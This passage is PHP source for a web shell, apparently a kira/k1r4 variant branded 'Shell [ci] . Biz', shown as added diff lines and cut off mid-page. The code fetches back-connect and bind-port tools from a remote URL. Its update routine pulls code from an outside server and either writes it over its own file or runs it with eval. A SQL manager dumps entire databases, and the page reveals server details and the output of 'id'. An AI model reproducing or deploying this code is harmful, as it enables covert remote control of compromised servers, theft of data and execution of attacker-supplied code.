00010) > 0; + $w["r"] = ($mode & 00004) > 0; $w["w"] = ($mode & 00002) > 0; $w["x"] = ($mode & 00001) > 0; + return array("t"=>$t,"o"=>$o,"g"=>$g,"w"=>$w); +} +} +if (!function_exists("parsesort")) +{ +function parsesort($sort) +{ + $one = intval($sort); + $second = substr($sort,-1); + if ($second != "d") {$second = "a";} + return array($one,$second); +} +} +if (!function_exists("view_perms_color")) +{ +function view_perms_color($o) +{ + if (!is_readable($o)) {return "<font color=red>".view_perms(fileperms($o))."</font>";} + elseif (!is_writable($o)) {return "<font color=white>".view_perms(fileperms($o))."</font>";} + else {return "<font color=green>".view_perms(fileperms($o))."</font>";} +} +} +if (!function_exists("k1r4getsource")) +{ +function k1r4getsource($fn) +{ + global $k1r4_sourcesurl; + $array = array( + "k1r4_bindport.pl" => "k1r4_bindport_pl.txt", + "k1r4_bindport.c" => "k1r4_bindport_c.txt", + "k1r4_backconn.pl" => "k1r4_backconn_pl.txt", + "k1r4_backconn.c" => "k1r4_backconn_c.txt", + "k1r4_datapipe.pl" => "k1r4_datapipe_pl.txt", + "k1r4_datapipe.c" => "k1r4_datapipe_c.txt", + ); + $name = $array[$fn]; + if ($name) {return file_get_contents($k1r4_sourcesurl.$name);} + else {return FALSE;} +} +} +if (!function_exists("k1r4_getupdate")) +{ +function k1r4_getupdate($update = TRUE) +{ + $url = $GLOBALS["k1r4_updateurl"]."?version=".urlencode(base64_encode($GLOBALS["shver"]))."&updatenow=".($updatenow?"1":"0")."&"; + $data = @file_get_contents($url); + if (!$data) {return "Can't connect to update-server!";} + else + { + $data = ltrim($data); + $string = substr($data,3,ord($data{2})); + if ($data{0} == "\x99" and $data{1} == "\x01") {return "Error: ".$string; return FALSE;} + if ($data{0} == "\x99" and $data{1} == "\x02") {return "You are using latest version!";} + if ($data{0} == "\x99" and $data{1} == "\x03") + { + $string = explode("\x01",$string); + if ($update) + { + $confvars = array(); + $sourceurl = $string[0]; + $source = file_get_contents($sourceurl); + if (!$source) {return "Can't fetch update!";} + else + { + $fp = fopen(__FILE__,"w"); + if (!$fp) {return "Local error: can't write update to ".__FILE__."! You may download kira.php manually <a href=\"".$sourceurl."\"><u>here</u></a>.";} + else {fwrite($fp,$source); fclose($fp); return "Thanks! Updated with success.";} + } + } + else {return "New version are available: ".$string[1];} + } + elseif ($data{0} == "\x99" and $data{1} == "\x04") {eval($string); return 1;} + else {return "Error in protocol: segmentation failed! (".$data.") ";} + } +} +} +if (!function_exists("mysql_dump")) +{ +function mysql_dump($set) +{ + global $shver; + $sock = $set["sock"]; + $db = $set["db"]; + $print = $set["print"]; + $nl2br = $set["nl2br"]; + $file = $set["file"]; + $add_drop = $set["add_drop"]; + $tabs = $set["tabs"]; + $onlytabs = $set["onlytabs"]; + $ret = array(); + $ret["err"] = array(); + if (!is_resource($sock)) {echo("Error: \$sock is not valid resource.");} + if (empty($db)) {$db = "db";} + if (empty($print)) {$print = 0;} + if (empty($nl2br)) {$nl2br = 0;} + if (empty($add_drop)) {$add_drop = TRUE;} + if (empty($file)) + { + $file = $tmpdir."dump_".getenv("SERVER_NAME")."_".$db."_".date("d-m-Y-H-i-s").".sql"; + } + if (!is_array($tabs)) {$tabs = array();} + if (empty($add_drop)) {$add_drop = TRUE;} + if (sizeof($tabs) == 0) + { + // retrive tables-list + $res = mysql_query("SHOW TABLES FROM ".$db, $sock); + if (mysql_num_rows($res) > 0) {while ($row = mysql_fetch_row($res)) {$tabs[] = $row[0];}} + } + $out = "# Dumped by kira.SQL v. ".$shver." +# Home page: http://google.com +# +# Host settings: +# MySQL version: (".mysql_get_server_info().") running on ".getenv("SERVER_ADDR")." (".getenv("SERVER_NAME").")"." +# Date: ".date("d.m.Y H:i:s")." +# DB: \"".$db."\" +#--------------------------------------------------------- +"; + $c = count($onlytabs); + foreach($tabs as $tab) + { + if ((in_array($tab,$onlytabs)) or (!$c)) + { + if ($add_drop) {$out .= "DROP TABLE IF EXISTS `".$tab."`;\n";} + // recieve query for create table structure + $res = mysql_query("SHOW CREATE TABLE `".$tab."`", $sock); + if (!$res) {$ret["err"][] = mysql_smarterror();} + else + { + $row = mysql_fetch_row($res); + $out .= $row["1"].";\n\n"; + // recieve table variables + $res = mysql_query("SELECT * FROM `$tab`", $sock); + if (mysql_num_rows($res) > 0) + { + while ($row = mysql_fetch_assoc($res)) + { + $keys = implode("`, `", array_keys($row)); + $values = array_values($row); + foreach($values as $k=>$v) {$values[$k] = addslashes($v);} + $values = implode("', '", $values); + $sql = "INSERT INTO `$tab`(`".$keys."`) VALUES ('".$values."');\n"; + $out .= $sql; + } + } + } + } + } + $out .= "#---------------------------------------------------------------------------------\n\n"; + if ($file) + { + $fp = fopen($file, "w"); + if (!$fp) {$ret["err"][] = 2;} + else + { + fwrite ($fp, $out); + fclose ($fp); + } + } + if ($print) {if ($nl2br) {echo nl2br($out);} else {echo $out;}} + return $out; +} +} +if (!function_exists("mysql_buildwhere")) +{ +function mysql_buildwhere($array,$sep=" and",$functs=array()) +{ + if (!is_array($array)) {$array = array();} + $result = ""; + foreach($array as $k=>$v) + { + $value = ""; + if (!empty($functs[$k])) {$value .= $functs[$k]."(";} + $value .= "'".addslashes($v)."'"; + if (!empty($functs[$k])) {$value .= ")";} + $result .= "`".$k."` = ".$value.$sep; + } + $result = substr($result,0,strlen($result)-strlen($sep)); + return $result; +} +} +if (!function_exists("mysql_fetch_all")) +{ +function mysql_fetch_all($query,$sock) +{ + if ($sock) {$result = mysql_query($query,$sock);} + else {$result = mysql_query($query);} + $array = array(); + while ($row = mysql_fetch_array($result)) {$array[] = $row;} + mysql_free_result($result); + return $array; +} +} +if (!function_exists("mysql_smarterror")) +{ +function mysql_smarterror($type,$sock) +{ + if ($sock) {$error = mysql_error($sock);} + else {$error = mysql_error();} + $error = htmlspecialchars($error); + return $error; +} +} +if (!function_exists("mysql_query_form")) +{ +function mysql_query_form() +{ + global $submit,$sql_act,$sql_query,$sql_query_result,$sql_confirm,$sql_query_error,$tbl_struct; + if (($submit) and (!$sql_query_result) and ($sql_confirm)) {if (!$sql_query_error) {$sql_query_error = "Query was empty";} echo "<b>Error:</b> <br>".$sql_query_error."<br>";} + if ($sql_query_result or (!$sql_confirm)) {$sql_act = $sql_goto;} + if ((!$submit) or ($sql_act)) + { + echo "<table border=0><tr><td><form name=\"k1r4_sqlquery\" method=POST><b>"; if (($sql_query) and (!$submit)) {echo "Do you really want to";} else {echo "SQL-Query";} echo ":</b><br><br><textarea name=sql_query cols=100 rows=10>".htmlspecialchars($sql_query)."</textarea><br><br><input type=hidden name=act value=sql><input type=hidden name=sql_act value=query><input type=hidden name=sql_tbl value=\"".htmlspecialchars($sql_tbl)."\"><input type=hidden name=submit value=\"1\"><input type=hidden name=\"sql_goto\" value=\"".htmlspecialchars($sql_goto)."\"><input type=submit name=sql_confirm value=\"Yes\">&nbsp;<input type=submit value=\"No\"></form></td>"; + if ($tbl_struct) + { + echo "<td valign=\"top\"><b>Fields:</b><br>"; + foreach ($tbl_struct as $field) {$name = $field["Field"]; echo "» <a href=\"#\" onclick=\"document.k1r4_sqlquery.sql_query.value+='`".$name."`';\"><b>".$name."</b></a><br>";} + echo "</td></tr></table>"; + } + } + if ($sql_query_result or (!$sql_confirm)) {$sql_query = $sql_last_query;} +} +} +if (!function_exists("mysql_create_db")) +{ +function mysql_create_db($db,$sock="") +{ + $sql = "CREATE DATABASE `".addslashes($db)."`;"; + if ($sock) {return mysql_query($sql,$sock);} + else {return mysql_query($sql);} +} +} +if (!function_exists("mysql_query_parse")) +{ +function mysql_query_parse($query) +{ + $query = trim($query); + $arr = explode (" ",$query); + /*array array() + { + "METHOD"=>array(output_type), + "METHOD1"... + ... + } + if output_type == 0, no output, + if output_type == 1, no output if no error + if output_type == 2, output without control-buttons + if output_type == 3, output with control-buttons + */ + $types = array( + "SELECT"=>array(3,1), + "SHOW"=>array(2,1), + "DELETE"=>array(1), + "DROP"=>array(1) + ); + $result = array(); + $op = strtoupper($arr[0]); + if (is_array($types[$op])) + { + $result["propertions"] = $types[$op]; + $result["query"] = $query; + if ($types[$op] == 2) + { + foreach($arr as $k=>$v) + { + if (strtoupper($v) == "LIMIT") + { + $result["limit"] = $arr[$k+1]; + $result["limit"] = explode(",",$result["limit"]); + if (count($result["limit"]) == 1) {$result["limit"] = array(0,$result["limit"][0]);} + unset($arr[$k],$arr[$k+1]); + } + } + } + } + else {return FALSE;} +} +} +if (!function_exists("k1r4fsearch")) +{ +function k1r4fsearch($d) +{ + global $found; + global $found_d; + global $found_f; + global $search_i_f; + global $search_i_d; + global $a; + if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;} + $h = opendir($d); + while (($f = readdir($h)) !== FALSE) + { + if($f != "." && $f != "..") + { + $bool = (empty($a["name_regexp"]) and strpos($f,$a["name"]) !== FALSE) || ($a["name_regexp"] and ereg($a["name"],$f)); + if (is_dir($d.$f)) + { + $search_i_d++; + if (empty($a["text"]) and $bool) {$found[] = $d.$f; $found_d++;} + if (!is_link($d.$f)) {k1r4fsearch($d.$f);} + } + else + { + $search_i_f++; + if ($bool) + { + if (!empty($a["text"])) + { + $r = @file_get_contents($d.$f); + if ($a["text_wwo"]) {$a["text"] = " ".trim($a["text"])." ";} + if (!$a["text_cs"]) {$a["text"] = strtolower($a["text"]); $r = strtolower($r);} + if ($a["text_regexp"]) {$bool = ereg($a["text"],$r);} + else {$bool = strpos(" ".$r,$a["text"],1);} + if ($a["text_not"]) {$bool = !$bool;} + if ($bool) {$found[] = $d.$f; $found_f++;} + } + else {$found[] = $d.$f; $found_f++;} + } + } + } + } + closedir($h); +} +} +if ($act == "gofile") {if (is_dir($f)) {$act = "ls"; $d = $f;} else {$act = "f"; $d = dirname($f); $f = basename($f);}} +//Sending headers +@ob_start(); +@ob_implicit_flush(0); +function onphpshutdown() +{ + global $gzipencode,$ft; + if (!headers_sent() and $gzipencode and !in_array($ft,array("img","download","notepad"))) + { + $v = @ob_get_contents(); + @ob_end_clean(); + @ob_start("ob_gzHandler"); + echo $v; + @ob_end_flush(); + } +} +function k1r4exit() +{ + onphpshutdown(); + exit; +} +header("Expires: Mon, 26 Jul 1997 05:00:00 GMT"); +header("Last-Modified: ".gmdate("D, d M Y H:i:s")." GMT"); +header("Cache-Control: no-store, no-cache, must-revalidate"); +header("Cache-Control: post-check=0, pre-check=0", FALSE); +header("Pragma: no-cache"); +if (empty($tmpdir)) +{ + $tmpdir = ini_get("upload_tmp_dir"); + if (is_dir($tmpdir)) {$tmpdir = "/tmp/";} +} +$tmpdir = realpath($tmpdir); +$tmpdir = str_replace("\\",DIRECTORY_SEPARATOR,$tmpdir); +if (substr($tmpdir,-1) != DIRECTORY_SEPARATOR) {$tmpdir .= DIRECTORY_SEPARATOR;} +if (empty($tmpdir_logs)) {$tmpdir_logs = $tmpdir;} +else {$tmpdir_logs = realpath($tmpdir_logs);} +if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on") +{ + $safemode = TRUE; + $hsafemode = "<font color=red>ON (secure)</font>"; +} +else {$safemode = FALSE; $hsafemode = "<font color=green>OFF (no secure)</font>";} +$v = @ini_get("open_basedir"); +if ($v or strtolower($v) == "on") {$openbasedir = TRUE; $hopenbasedir = "<font color=red>".$v."</font>";} +else {$openbasedir = FALSE; $hopenbasedir = "<font color=green>OFF (not secure)</font>";} +$sort = htmlspecialchars($sort); +if (empty($sort)) {$sort = $sort_default;} +$sort[1] = strtolower($sort[1]); +$DISP_SERVER_SOFTWARE = getenv("SERVER_SOFTWARE"); +if (!ereg("PHP/".phpversion(),$DISP_SERVER_SOFTWARE)) {$DISP_SERVER_SOFTWARE .= ". PHP/".phpversion();} +$DISP_SERVER_SOFTWARE = str_replace("PHP/".phpversion(),"<a href=\"".$surl."act=phpinfo\" target=\"_blank\"><b><u>PHP/".phpversion()."</u></b></a>",htmlspecialchars($DISP_SERVER_SOFTWARE)); +@ini_set("highlight.bg",$highlight_bg); //FFFFFF +@ini_set("highlight.comment",$highlight_comment); //#FF8000 +@ini_set("highlight.default",$highlight_default); //#0000BB +@ini_set("highlight.html",$highlight_html); //#000000 +@ini_set("highlight.keyword",$highlight_keyword); //#007700 +@ini_set("highlight.string",$highlight_string); //#DD0000 +if (!is_array($actbox)) {$actbox = array();} +$dspact = $act = htmlspecialchars($act); +$disp_fullpath = $ls_arr = $notls = null; +$ud = urlencode($d); +?> +<html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1251"><meta http-equiv="Content-Language" content="en-us"><title><?php echo getenv("HTTP_HOST"); ?> - Shellci.biz</title><STYLE> +TD { FONT-SIZE: 8pt; COLOR: #009900; FONT-FAMILY: verdana;}BODY { scrollbar-face-color: #800000; scrollbar-shadow-color: #101010; scrollbar-highlight-color: #101010; scrollbar-3dlight-color: #101010; scrollbar-darkshadow-color: #101010; scrollbar-track-color: #101010; scrollbar-arrow-color: #101010; font-family: Verdana;}TD.header { FONT-WEIGHT: normal; FONT-SIZE: 10pt; BACKGROUND: #7d7474; COLOR: white; FONT-FAMILY: verdana;}A { FONT-WEIGHT: normal; COLOR: #0099CC; FONT-FAMILY: Tahoma; TEXT-DECORATION: none;}A:unknown { FONT-WEIGHT: normal; COLOR: #ffffff; FONT-FAMILY: verdana; TEXT-DECORATION: none;}A.Links { COLOR: #ffffff; TEXT-DECORATION: none;}A.Links:unknown { FONT-WEIGHT: normal; COLOR: #ffffff; TEXT-DECORATION: none;}A:hover { COLOR: #ffffff; TEXT-DECORATION: underline;}.skin0{position:absolute; width:200px; border:2px solid black; background-color:menu; font-family:Verdana; line-height:20px; cursor:default; visibility:hidden;;}.skin1{cursor: default; font: menutext; position: absolute; width: 145px; background-color: menu; border: 1 solid buttonface;visibility:hidden; border: 2 outset buttonhighlight; font-family: Verdana,Geneva, Arial; font-size: 10px; color: black;}.menuitems{padding-left:15px; padding-right:10px;;}input{background-color: #000099; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}textarea{background-color: #000099; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}button{background-color: #000066; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}select{background-color: #000066; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}option {background-color: #000066; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}iframe {background-color: #000066; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}p {MARGIN-TOP: 0px; MARGIN-BOTTOM: 0px; LINE-HEIGHT: 150%}blockquote{ font-size: 8pt; font-family: Courier, Fixed, Arial; border : 8px solid #A9A9A9; padding: 1em; margin-top: 1em; margin-bottom: 5em; margin-right: 3em; margin-left: 4em; background-color: #000000;}body,td,th { font-family: verdana; color: #CCCCCC; font-size: 11px;}body { background-color: #000000;} +</style></head><BODY text=#ffffff bottomMargin=0 bgColor=#000000 leftMargin=0 topMargin=0 rightMargin=0 marginheight=0 marginwidth=0><center><TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=5 width="100%" bgColor=#000000 borderColorLight=#c0c0c0 border=1 bordercolor="#C0C0C0"><tr><th width="101%" height="15" nowrap bordercolor="#C0C0C0" valign="top" colspan="2"><p><font face=Webdings size=6><b>!</b></font><a href="<?php echo $surl; ?>"><font face="Verdana" size="5"><b>Shell [ci] . Biz <?php echo $shver; ?></b></font></a><font face=Webdings size=6><b>!</b></font></p></center></th></tr><tr><td><p align="left"><b>Software:&nbsp;<?php echo $DISP_SERVER_SOFTWARE; ?></b>&nbsp;</p><p align="left"><b>uname -a:&nbsp;<?php echo wordwrap(php_uname(),90,"<br>",1); ?></b>&nbsp;</p><p align="left"><b><?php if (!$win) {echo wordwrap(myshellexec("id"),90,"<br>",1);} else {echo get_current_user();} ?></b>&nbsp;</p><p align="left"><b>Safe-mode:&nbsp;<?php echo $hsafemode; ?></b></p><p align="left"><?php +$d = str_replace("\\",DIRECTORY_SEPARATOR,$d); +if (empty($d)) {$d = realpath(".");} elseif(realpath($d)) {$d = realpath($d);} +$d = str_replace("\\",DIRECTORY_SEPARATOR,$d); +if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;} +$d = str_replace("\\\\","\\",$d); +$dispd = htmlspecialchars($d); +$pd = $e = explode(DIRECTORY_SEPARATOR,substr($d,0,-1)); +$i = 0; +foreach($pd as $b) +{ + $t = ""; + $j = 0; + foreach ($e as $r) + { + $t.= $r.DIRECTORY_SEPARATOR; + if ($j == $i) {break;} + $j++; + } + echo "<a href=\"".$surl."act=ls&d=".urlencode($t)."&sort=".$sort."\"><b>".htmlspecialchars($b).DIRECTORY_SEPARATOR."</b></a>"; + $i++; +} +echo "&nbsp;&nbsp;&nbsp;"; +if (is_writable($d)) +{ + $wd = TRUE; + $wdt = "<font color=green>[ ok ]</font>"; + echo "<b><font color=green>".view_perms(fileperms($d))."</font></b>"; +} +else +{ + $wd = FALSE; + $wdt = "<font color=red>[ Read-Only ]</font>"; + echo "<b>".view_perms_color($d)."</b>"; +} +if (is_callable("disk_free_space")) +{ + $free = disk_free_space($d); + $total = disk_total_space($d); + if ($free === FALSE) {$free = 0;} + if ($total === FALSE) {$total = 0;} + if ($free < 0) {$free = 0;} + if ($total < 0) {$total = 0;} + $used = $total-$free; + $free_percent = round(100/($total/$free),2); + echo "<br><b>Free ".view_size($free)." of ".view_size($total)." (".$free_percent."%)</b>"; +} +echo "<br>"; +$letters = ""; +if ($win) +{ + $v = explode("\\",$d); + $v = $v[0]; + foreach (range("a","z") as $letter) + { + $bool = $isdiskette = in_array($letter,$safemode_diskettes); + if (!$bool) {$bool = is_dir($letter.":\\");} + if ($bool) + { + $letters .= "<a href=\"".$surl."act=ls&d=".urlencode($letter.":\\")."\"".($isdiskette?" onclick=\"return confirm('Make sure that the diskette is inserted properly, otherwise an error may occur.')\"":"").">[ "; + if ($letter.":" != $v) {$letters .= $letter;} + else {$letters .= "<font color=green>".$letter."</font>";} + $letters .= " ]</a> "; + } + } + if (!empty($letters)) {echo "<b>Detected drives</b>: ".$letters."<br>";} +} +if (count($quicklaunch) > 0) +{ + foreach($quicklaunch as $item) + { + $item[1] = str_replace("%d",urlencode($d),$item[1]); + $item[1] = str_replace("%sort",$sort,$item[1]); + $v = realpath($d.".."); + if (empty($v)) {$a = explode(DIRECTORY_SEPARATOR,$d); unset($a[count($a)-2]); $v = join(DIRECTORY_SEPARATOR,$a);} + $item[1] = str_replace("%upd",urlencode($v),$item[1]); + echo "<a href=\"".$item[1]."\">".$item[0]."</a>&nbsp;&nbsp;&nbsp;&nbsp;"; + } +} +echo "</p></td></tr></table><br>"; +if ((!empty($donated_html)) and (in_array($act,$donated_act))) {echo "<TABLE style=\"BORDER-COLLAPSE: collapse\" cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"100%\" bgColor=#000000 borderColorLight=#c0c0c0 border=1><tr><td width=\"100%\" valign=\"top\">".$donated_html."</td></tr></table><br>";} +echo "<TABLE style=\"BORDER-COLLAPSE: collapse\" cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"100%\" bgColor=#000000 borderColorLight=#c0c0c0 border=1><tr><td width=\"100%\" valign=\"top\">"; +if ($act == "") {$act = $dspact = "ls";} +if ($act == "sql") +{ + $sql_surl = $surl."act=sql"; + if ($sql_login) {$sql_surl .= "&sql_login=".htmlspecialchars($sql_login);} + if ($sql_passwd) {$sql_surl .= "&sql_passwd=".htmlspecialchars($sql_passwd);} + if ($sql_server) {$sql_surl .= "&sql_server=".htmlspecialchars($sql_server);} + if ($sql_port) {$sql_surl .= "&sql_port=".htmlspecialchars($sql_port);} + if ($sql_db) {$sql_surl .= "&sql_db=".htmlspecialchars($sql_db);} + $sql_surl .= "&"; + ?><h3>Attention! SQL-Manager is <u>NOT</u> ready module! Don't reports bugs.</h3><TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=5 width="100%" bgColor=#000000 borderColorLight=#c0c0c0 border=1 bordercolor="#C0C0C0"><tr><td width="100%" height="1" colspan="2" valign="top"><center><?php + if ($sql_server) + { + $sql_sock = mysql_connect($sql_server.":".$sql_port, $sql_login, $sql_passwd); + $err = mysql_smarterror(); + @mysql_select_db($sql_db,$sql_sock); + if ($sql_query and $submit) {$sql_query_result = mysql_query($sql_query,$sql_sock); $sql_query_error = mysql_smarterror();} + } + else {$sql_sock = FALSE;} + echo "<b>SQL Manager:</b><br>"; + if (!$sql_sock) + { + if (!$sql_server) {echo "NO CONNECTION";} + else {echo "<center><b>Can't connect</b></center>"; echo "<b>".$err."</b>";} + } + else + { + $sqlquicklaunch = array(); + $sqlquicklaunch[] = array("Index",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&"); + $sqlquicklaunch[] = array("Query",$sql_surl."sql_act=query&sql_tbl=".urlencode($sql_tbl)); + $sqlquicklaunch[] = array("Server-status",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=serverstatus"); + $sqlquicklaunch[] = array("Server variables",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=servervars"); + $sqlquicklaunch[] = array("Processes",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=processes"); + $sqlquicklaunch[] = array("Logout",$surl."act=sql"); + echo "<center><b>MySQL ".mysql_get_server_info()." (proto v.".mysql_get_proto_info ().") running in ".htmlspecialchars($sql_server).":".htmlspecialchars($sql_port)." as ".htmlspecialchars($sql_login)."@".htmlspecialchars($sql_server)." (password - \"".htmlspecialchars($sql_passwd)."\")</b><br>"; + if (count($sqlquicklaunch) > 0) {foreach($sqlquicklaunch as $item) {echo "[ <a href=\"".$item[1]."\"><b>".$item[0]."</b></a> ] ";}} + echo "</center>"; + } + echo "</td></tr><tr>"; + if (!$sql_sock) {?><td width="28%" height="100" valign="top"><center><font size="5"> i </font></center><li>If login is null, login is owner of process.<li>If host is null, host is localhost</b><li>If port is null, port is 3306 (default)</td><td width="90%" height="1" valign="top"><TABLE height=1 cellSpacing=0 cellPadding=0 width="100%" border=0><tr><td>&nbsp;<b>Please, fill the form:</b><table><tr><td><b>Username</b></td><td><b>Password</b>&nbsp;</td><td><b>Database</b>&nbsp;</td></tr><form action="<?php echo $surl; ?>" method="POST"><input type="hidden" name="act" value="sql"><tr><td><input type="text" name="sql_login" value="root" maxlength="64"></td><td><input type="password" name="sql_passwd" value="" maxlength="64"></td><td><input type="text" name="sql_db" value="" maxlength="64"></td></tr><tr><td><b>Host</b></td><td><b>PORT</b></td></tr><tr><td align=right><input type="text" name="sql_server" value="localhost" maxlength="64"></td><td><input type="text" name="sql_port" value="3306" maxlength="6" size="3"></td><td><input type="submit" value="Connect"></td></tr><tr><td></td></tr></form></table></td><?php } + else + { + //Start left panel + if (!empty($sql_db)) + { + ?><td width="25%" height="100%" valign="top"><a href="<?php echo $surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&"; ?>"><b>Home</b></a><hr size="1" noshade><?php + $result = mysql_list_tables($sql_db); + if (!$result) {echo mysql_smarterror();} + else + { + echo "---[ <a href=\"".$sql_surl."&\"><b>".htmlspecialchars($sql_db)."</b></a> ]---<br>"; + $c = 0; + while ($row = mysql_fetch_array($result)) {$count = mysql_query ("SELECT COUNT(*) FROM ".$row[0]); $count_row = mysql_fetch_array($count); echo "<b>»&nbsp;<a href=\"".$sql_surl."sql_db=".htmlspecialchars($sql_db)."&sql_tbl=".htmlspecialchars($row[0])."\"><b>".htmlspecialchars($row[0])."</b></a> (".$count_row[0].")</br></b>"; mysql_free_result($count); $c++;} + if (!$c) {echo "No tables found in database.";} + } + } + else + { + ?><td width="1" height="100" valign="top"><a href="<?php echo $sql_surl; ?>"><b>Home</b></a><hr size="1" noshade><?php + $result = mysql_list_dbs($sql_sock); + if (!$result) {echo mysql_smarterror();} + else + { + ?><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><select name="sql_db"><?php + $c = 0; + $dbs = ""; + while ($row = mysql_fetch_row($result)) {$dbs .= "<option value=\"".$row[0]."\""; if ($sql_db == $row[0]) {$dbs .= " selected";} $dbs .= ">".$row[0]."</option>"; $c++;} + echo "<option value=\"\">Databases (".$c.")</option>"; + echo $dbs; + } + ?></select><hr size="1" noshade>Please, select database<hr size="1" noshade><input type="submit" value="Go"></form><?php + } + //End left panel + echo "</td><td width=\"100%\" height=\"1\" valign=\"top\">"; + //Start center panel + $diplay = TRUE; + if ($sql_db) + { + if (!is_numeric($c)) {$c = 0;} + if ($c == 0) {$c = "no";} + echo "<hr size=\"1\" noshade><center><b>There are ".$c." table(s) in this DB (".htmlspecialchars($sql_db).").<br>"; + if (count($dbquicklaunch) > 0) {foreach($dbsqlquicklaunch as $item) {echo "[ <a href=\"".$item[1]."\">".$item[0]."</a> ] ";}} + echo "</b></center>"; + $acts = array("","dump"); + if ($sql_act == "tbldrop") {$sql_query = "DROP TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";} + elseif ($sql_act == "tblempty") {$sql_query = ""; foreach($boxtbl as $v) {$sql_query .= "DELETE FROM `".$v."` \n";} $sql_act = "query";} + elseif ($sql_act == "tbldump") {if (count($boxtbl) > 0) {$dmptbls = $boxtbl;} elseif($thistbl) {$dmptbls = array($sql_tbl);} $sql_act = "dump";} + elseif ($sql_act == "tblcheck") {$sql_query = "CHECK TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";} + elseif ($sql_act == "tbloptimize") {$sql_query = "OPTIMIZE TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";} + elseif ($sql_act == "tblrepair") {$sql_query = "REPAIR TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";} + elseif ($sql_act == "tblanalyze") {$sql_query = "ANALYZE TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";} + elseif ($sql_act == "deleterow") {$sql_query = ""; if (!empty($boxrow_all)) {$sql_query = "DELETE * FROM `".$sql_tbl."`;";} else {foreach($boxrow as $v) {$sql_query .= "DELETE * FROM `".$sql_tbl."` WHERE".$v." LIMIT 1;\n";} $sql_query = substr($sql_query,0,-1);} $sql_act = "query";} + elseif ($sql_tbl_act == "insert") + { + if ($sql_tbl_insert_radio == 1) + { + $keys = ""; + $akeys = array_keys($sql_tbl_insert); + foreach ($akeys as $v) {$keys .= "`".addslashes($v)."`, ";} + if (!empty($keys)) {$keys = substr($keys,0,strlen($keys)-2);} + $values = ""; + $i = 0; + foreach (array_values($sql_tbl_insert) as $v) {if ($funct = $sql_tbl_insert_functs[$akeys[$i]]) {$values .= $funct." (";} $values .= "'".addslashes($v)."'"; if ($funct) {$values .= ")";} $values .= ", "; $i++;} + if (!empty($values)) {$values = substr($values,0,strlen($values)-2);} + $sql_query = "INSERT INTO `".$sql_tbl."` ( ".$keys." ) VALUES ( ".$values." );"; + $sql_act = "query"; + $sql_tbl_act = "browse"; + } + elseif ($sql_tbl_insert_radio == 2) + { + $set = mysql_buildwhere($sql_tbl_insert,", ",$sql_tbl_insert_functs); + $sql_query = "UPDATE `".$sql_tbl."` SET ".$set." WHERE ".$sql_tbl_insert_q." LIMIT 1;"; + $result = mysql_query($sql_query) or print(mysql_smarterror()); + $result = mysql_fetch_array($result, MYSQL_ASSOC); + $sql_act = "query"; + $sql_tbl_act = "browse"; + } + } + if ($sql_act == "query") + { + echo "<hr size=\"1\" noshade>"; + if (($submit) and (!$sql_query_result) and ($sql_confirm)) {if (!$sql_query_error) {$sql_query_error = "Query was empty";} echo "<b>Error:</b> <br>".$sql_query_error."<br>";} + if ($sql_query_result or (!$sql_confirm)) {$sql_act = $sql_goto;} + if ((!$submit) or ($sql_act)) {echo "<table border=\"0\" width=\"100%\" height=\"1\"><tr><td><form action=\"".$sql_surl."\" method=\"POST\"><b>"; if (($sql_query) and (!$submit)) {echo "Do you really want to:";} else {echo "SQL-Query :";} echo "</b><br><br><textarea name=\"sql_query\" cols=\"100\" rows=\"10\">".htmlspecialchars($sql_query)."</textarea><br><br><input type=\"hidden\" name=\"sql_act\" value=\"query\"><input type=\"hidden\" name=\"sql_tbl\" value=\"".htmlspecialchars($sql_tbl)."\"><input 